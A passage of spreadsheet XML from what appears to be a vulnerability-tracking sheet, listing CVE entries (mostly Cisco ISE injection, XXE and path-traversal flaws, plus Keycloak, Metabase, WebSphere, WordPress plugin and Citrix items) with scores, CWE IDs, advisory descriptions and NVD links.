      <c r="E1266" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1266" s="5" t="inlineStr"/>
      <c r="H1266" s="5" t="inlineStr"/>
      <c r="I1266" s="5" t="inlineStr"/>
      <c r="J1266" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K1266" s="5" t="inlineStr"/>
      <c r="L1266" s="5" t="inlineStr"/>
      <c r="M1266" s="5" t="inlineStr"/>
      <c r="N1266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1266" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1266" s="5" t="inlineStr"/>
      <c r="Q1266" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R1266" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the REST API of Cisco ISE and Cisco ISE-PIC could allow an authenticated, remote attacker to conduct SQL injection attacks against the monitoring database.
This vulnerability is due to insufficient validation of specific parameters that are then concatenated into an SQL statement. An attacker could exploit this vulnerability by sending a crafted request that contains SQL statements in one of the affected parameters. A successful exploit could allow the attacker to read information from the monitoring database. To exploit this vulnerability, the attacker must have valid administrative credentials.</t>
        </is>
      </c>
      <c r="S1266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76426</t>
        </is>
      </c>
    </row>
    <row r="1267">
      <c r="A1267" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1267" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76427</t>
        </is>
      </c>
      <c r="D1267" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E1267" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1267" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1267" s="5" t="inlineStr"/>
      <c r="H1267" s="5" t="inlineStr"/>
      <c r="I1267" s="5" t="inlineStr"/>
      <c r="J1267" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K1267" s="5" t="inlineStr"/>
      <c r="L1267" s="5" t="inlineStr"/>
      <c r="M1267" s="5" t="inlineStr"/>
      <c r="N1267" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1267" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1267" s="5" t="inlineStr"/>
      <c r="Q1267" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R1267" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the offline profiler feed service of Cisco ISE could allow an authenticated, remote attacker to read arbitrary files that are stored on an affected device.
This vulnerability is due to the parsing of attacker-controlled feed metadata with an XML parser that does not disable external entity resolution. An attacker could exploit this vulnerability by uploading a crafted offline feed package through the administrative interface. A successful exploit could allow the attacker to read arbitrary files from the file system and issue requests to internal systems from the affected device. To exploit this vulnerability, the attacker must have valid administrative credentials.</t>
        </is>
      </c>
      <c r="S1267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76427</t>
        </is>
      </c>
    </row>
    <row r="1268">
      <c r="A1268" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1268" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76428</t>
        </is>
      </c>
      <c r="D1268" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E1268" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1268" s="5" t="inlineStr"/>
      <c r="H1268" s="5" t="inlineStr"/>
      <c r="I1268" s="5" t="inlineStr"/>
      <c r="J1268" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K1268" s="5" t="inlineStr"/>
      <c r="L1268" s="5" t="inlineStr"/>
      <c r="M1268" s="5" t="inlineStr"/>
      <c r="N1268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1268" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1268" s="5" t="inlineStr"/>
      <c r="Q1268" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R1268" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the REST APIs of Cisco ISE and Cisco ISE-PIC could allow an authenticated, remote attacker to conduct SQL injection attacks against the session database.
This vulnerability is due to certain parameters being concatenated directly into SQL clauses without parameterization. An attacker could exploit this vulnerability by sending a crafted request that contains SQL statements in one of the affected parameters. A successful exploit could allow the attacker to read information from the session database. To exploit this vulnerability, the attacker must have valid administrative credentials.</t>
        </is>
      </c>
      <c r="S1268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76428</t>
        </is>
      </c>
    </row>
    <row r="1269">
      <c r="A1269" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1269" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76431</t>
        </is>
      </c>
      <c r="D1269" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E1269" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1269" s="5" t="inlineStr"/>
      <c r="H1269" s="5" t="inlineStr"/>
      <c r="I1269" s="5" t="inlineStr"/>
      <c r="J1269" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K1269" s="5" t="inlineStr"/>
      <c r="L1269" s="5" t="inlineStr"/>
      <c r="M1269" s="5" t="inlineStr"/>
      <c r="N1269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1269" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1269" s="5" t="inlineStr"/>
      <c r="Q1269" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1269" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the file management function of the web-based management interface of Cisco ISE and Cisco ISE-PIC could allow an authenticated, remote attacker to delete arbitrary files and directories on an affected device. To exploit this vulnerability, the attacker must have valid administrative credentials.
This vulnerability is due to improper validation of directory traversal character sequences in a user-supplied file path before the request is validated. An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface of an affected device. A successful exploit could allow the attacker to delete arbitrary files and directories on the underlying operating system of the affected device.</t>
        </is>
      </c>
      <c r="S1269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76431</t>
        </is>
      </c>
    </row>
    <row r="1270">
      <c r="A1270" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1270" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76432</t>
        </is>
      </c>
      <c r="D1270" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E1270" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1270" s="5" t="inlineStr"/>
      <c r="H1270" s="5" t="inlineStr"/>
      <c r="I1270" s="5" t="inlineStr"/>
      <c r="J1270" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K1270" s="5" t="inlineStr"/>
      <c r="L1270" s="5" t="inlineStr"/>
      <c r="M1270" s="5" t="inlineStr"/>
      <c r="N1270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1270" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1270" s="5" t="inlineStr"/>
      <c r="Q1270" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1270" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of Cisco ISE and Cisco ISE-PIC could allow an authenticated, remote attacker with administrative-level privileges to write arbitrary files on an affected device.
This vulnerability exists because the affected software does not properly validate directory traversal character sequences in a user-supplied file path during the upload process. An attacker could exploit this vulnerability by uploading a crafted file to the affected system. A successful exploit could allow the attacker to write files to an arbitrary location on the affected system.</t>
        </is>
      </c>
      <c r="S1270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76432</t>
        </is>
      </c>
    </row>
    <row r="1271">
      <c r="A1271" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1271" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76434</t>
        </is>
      </c>
      <c r="D1271" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E1271" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1271" s="5" t="inlineStr"/>
      <c r="H1271" s="5" t="inlineStr"/>
      <c r="I1271" s="5" t="inlineStr"/>
      <c r="J1271" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K1271" s="5" t="inlineStr"/>
      <c r="L1271" s="5" t="inlineStr"/>
      <c r="M1271" s="5" t="inlineStr"/>
      <c r="N1271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1271" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1271" s="5" t="inlineStr"/>
      <c r="Q1271" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1271" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the certificate import functionality of the web-based management interface of Cisco ISE and Cisco ISE-PIC could allow an authenticated, remote attacker to read arbitrary files from the affected system. To exploit this vulnerability, the attacker must have valid administrative credentials.
This vulnerability is due to insufficient validation of user-supplied input by the affected feature. An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface of an affected device. A successful exploit could allow the attacker to read arbitrary files from the affected device, which could contain sensitive information.</t>
        </is>
      </c>
      <c r="S1271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76434</t>
        </is>
      </c>
    </row>
    <row r="1272">
      <c r="A1272" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1272" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76446</t>
        </is>
      </c>
      <c r="D1272" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E1272" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1272" s="5" t="inlineStr"/>
      <c r="H1272" s="5" t="inlineStr"/>
      <c r="I1272" s="5" t="inlineStr"/>
      <c r="J1272" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K1272" s="5" t="inlineStr"/>
      <c r="L1272" s="5" t="inlineStr"/>
      <c r="M1272" s="5" t="inlineStr"/>
      <c r="N1272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1272" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1272" s="5" t="inlineStr"/>
      <c r="Q1272" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R1272" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in an API of Cisco ISE and Cisco ISE-PIC could allow an authenticated, remote attacker to read specific&amp;nbsp;files on the underlying operating system of an affected device.
This vulnerability is due to improper restriction of XML external entity references. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to read specific&amp;nbsp;files on the affected system that the underlying process has permission to access.</t>
        </is>
      </c>
      <c r="S1272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76446</t>
        </is>
      </c>
    </row>
    <row r="1273">
      <c r="A1273" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1273" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76448</t>
        </is>
      </c>
      <c r="D1273" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E1273" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1273" s="5" t="inlineStr"/>
      <c r="H1273" s="5" t="inlineStr"/>
      <c r="I1273" s="5" t="inlineStr"/>
      <c r="J1273" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K1273" s="5" t="inlineStr"/>
      <c r="L1273" s="5" t="inlineStr"/>
      <c r="M1273" s="5" t="inlineStr"/>
      <c r="N1273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1273" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1273" s="5" t="inlineStr"/>
      <c r="Q1273" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R1273" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) could allow an authenticated, remote attacker to conduct an SQL or HQL injection attack on an affected device.
This vulnerability is due to insufficient validation of user-supplied input to the affected APIs before it is used to build database queries. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to execute arbitrary SQL or HQL queries against the underlying database, which could allow the attacker to view or modify data that they are not authorized to access. To exploit this vulnerability, the attacker must have valid administrative credentials.</t>
        </is>
      </c>
      <c r="S1273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76448</t>
        </is>
      </c>
    </row>
    <row r="1274">
      <c r="A1274" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1274" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76449</t>
        </is>
      </c>
      <c r="D1274" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E1274" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1274" s="5" t="inlineStr"/>
      <c r="H1274" s="5" t="inlineStr"/>
      <c r="I1274" s="5" t="inlineStr"/>
      <c r="J1274" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K1274" s="5" t="inlineStr"/>
      <c r="L1274" s="5" t="inlineStr"/>
      <c r="M1274" s="5" t="inlineStr"/>
      <c r="N1274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1274" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1274" s="5" t="inlineStr"/>
      <c r="Q1274" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R1274" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) could allow an authenticated, remote attacker to conduct an SQL or HQL injection attack on an affected device.
This vulnerability is due to insufficient validation of user-supplied input to the affected APIs before it is used to build database queries. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to execute arbitrary SQL or HQL queries against the underlying database, which could allow the attacker to view or modify data that they are not authorized to access. To exploit this vulnerability, the attacker must have valid administrative credentials.</t>
        </is>
      </c>
      <c r="S1274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76449</t>
        </is>
      </c>
    </row>
    <row r="1275">
      <c r="A1275" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1275" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76450</t>
        </is>
      </c>
      <c r="D1275" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E1275" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1275" s="5" t="inlineStr"/>
      <c r="H1275" s="5" t="inlineStr"/>
      <c r="I1275" s="5" t="inlineStr"/>
      <c r="J1275" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K1275" s="5" t="inlineStr"/>
      <c r="L1275" s="5" t="inlineStr"/>
      <c r="M1275" s="5" t="inlineStr"/>
      <c r="N1275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1275" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1275" s="5" t="inlineStr"/>
      <c r="Q1275" s="5" t="inlineStr">
        <is>
          <t>CWE-564</t>
        </is>
      </c>
      <c r="R1275" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) could allow an authenticated, remote attacker to conduct an SQL or HQL injection attack on an affected device.
This vulnerability is due to insufficient validation of user-supplied input to the affected APIs before it is used to build database queries. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to execute arbitrary SQL or HQL queries against the underlying database, which could allow the attacker to view or modify data that they are not authorized to access. To exploit this vulnerability, the attacker must have valid administrative credentials.</t>
        </is>
      </c>
      <c r="S1275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76450</t>
        </is>
      </c>
    </row>
    <row r="1276">
      <c r="A1276" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1276" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76451</t>
        </is>
      </c>
      <c r="D1276" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E1276" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1276" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1276" s="5" t="inlineStr"/>
      <c r="H1276" s="5" t="inlineStr"/>
      <c r="I1276" s="5" t="inlineStr"/>
      <c r="J1276" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K1276" s="5" t="inlineStr"/>
      <c r="L1276" s="5" t="inlineStr"/>
      <c r="M1276" s="5" t="inlineStr"/>
      <c r="N1276" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1276" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1276" s="5" t="inlineStr"/>
      <c r="Q1276" s="5" t="inlineStr">
        <is>
          <t>CWE-564</t>
        </is>
      </c>
      <c r="R1276" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) could allow an authenticated, remote attacker to conduct an SQL or HQL injection attack on an affected device.
This vulnerability is due to insufficient validation of user-supplied input to the affected APIs before it is used to build database queries. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to execute arbitrary SQL or HQL queries against the underlying database, which could allow the attacker to view or modify data that they are not authorized to access. To exploit this vulnerability, the attacker must have valid administrative credentials.</t>
        </is>
      </c>
      <c r="S1276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76451</t>
        </is>
      </c>
    </row>
    <row r="1277">
      <c r="A1277" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1277" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89298</t>
        </is>
      </c>
      <c r="D1277" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E1277" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1277" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G1277" s="5" t="inlineStr"/>
      <c r="H1277" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1277" s="5" t="inlineStr"/>
      <c r="J1277" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K1277" s="5" t="inlineStr"/>
      <c r="L1277" s="5" t="inlineStr"/>
      <c r="M1277" s="5" t="inlineStr"/>
      <c r="N1277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1277" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1277" s="5" t="inlineStr"/>
      <c r="Q1277" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1277" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Dynamic Client Registration service of Keycloak, an open-source identity and access management solution. The issue occurs when a user with the view-clients role accesses the client registration endpoint to retrieve client details. Due to a failure to mask sensitive information, the service returns the client's confidential secret in cleartext. This could allow a read-only administrator to obtain full access to the affected client's account and potentially escalate their privileges within the realm.</t>
        </is>
      </c>
      <c r="S1277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89298</t>
        </is>
      </c>
    </row>
    <row r="1278">
      <c r="A1278" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1278" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92813</t>
        </is>
      </c>
      <c r="D1278" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E1278" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1278" s="5" t="inlineStr"/>
      <c r="H1278" s="5" t="inlineStr"/>
      <c r="I1278" s="5" t="inlineStr"/>
      <c r="J1278" s="5" t="inlineStr"/>
      <c r="K1278" s="5" t="inlineStr"/>
      <c r="L1278" s="5" t="inlineStr"/>
      <c r="M1278" s="5" t="inlineStr"/>
      <c r="N1278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1278" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1278" s="5" t="inlineStr"/>
      <c r="Q1278" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1278" s="5" t="inlineStr">
        <is>
          <t>Metabase through 0.63.18 fails to properly validate the unspecified address 0.0.0.0 in custom GeoJSON URLs, allowing unauthenticated attackers to reach loopback services. Attackers can save a malicious GeoJSON entry with 0.0.0.0 and trigger requests that return loopback service responses to unauthenticated callers.</t>
        </is>
      </c>
      <c r="S1278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92813</t>
        </is>
      </c>
    </row>
    <row r="1279">
      <c r="A1279" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1279" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16189</t>
        </is>
      </c>
      <c r="D1279" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E1279" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1279" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G1279" s="5" t="inlineStr"/>
      <c r="H1279" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1279" s="5" t="inlineStr"/>
      <c r="J1279" s="5" t="inlineStr"/>
      <c r="K1279" s="5" t="inlineStr"/>
      <c r="L1279" s="5" t="inlineStr"/>
      <c r="M1279" s="5" t="inlineStr"/>
      <c r="N1279" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1279" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1279" s="5" t="inlineStr"/>
      <c r="Q1279" s="5" t="inlineStr">
        <is>
          <t>CWE-117</t>
        </is>
      </c>
      <c r="R1279" s="5" t="inlineStr">
        <is>
          <t>IBM WebSphere Application Server 9.0, and 8.5 could allow a remote attacker to inject forged log entries into the server's administrative log.</t>
        </is>
      </c>
      <c r="S1279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16189</t>
        </is>
      </c>
    </row>
    <row r="1280">
      <c r="A1280" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1280" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19857</t>
        </is>
      </c>
      <c r="D1280" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E1280" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1280" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G1280" s="5" t="inlineStr"/>
      <c r="H1280" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1280" s="5" t="inlineStr"/>
      <c r="J1280" s="5" t="inlineStr"/>
      <c r="K1280" s="5" t="inlineStr"/>
      <c r="L1280" s="5" t="inlineStr"/>
      <c r="M1280" s="5" t="inlineStr"/>
      <c r="N1280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1280" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1280" s="5" t="inlineStr"/>
      <c r="Q1280" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="R1280" s="5" t="inlineStr">
        <is>
          <t>The Formidable Forms WordPress plugin before 6.35 does not prevent a request-derived value from reaching the WordPress shortcode parser when it substitutes a supported token into a form's custom HTML, allowing unauthenticated visitors to have arbitrary shortcodes, with attacker-chosen attributes, executed server-side on any page displaying an affected form.</t>
        </is>
      </c>
      <c r="S1280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19857</t>
        </is>
      </c>
    </row>
    <row r="1281">
      <c r="A1281" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1281" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78546</t>
        </is>
      </c>
      <c r="D1281" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E1281" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1281" s="5" t="inlineStr">
        <is>
          <t>secure@citrix.com</t>
        </is>
      </c>
      <c r="G1281" s="5" t="inlineStr"/>
      <c r="H1281" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1281" s="5" t="inlineStr"/>
      <c r="J1281" s="5" t="inlineStr"/>
      <c r="K1281" s="5" t="inlineStr"/>
      <c r="L1281" s="5" t="inlineStr"/>
      <c r="M1281" s="5" t="inlineStr"/>
      <c r="N1281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1281" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1281" s="5" t="inlineStr"/>
      <c r="Q1281" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
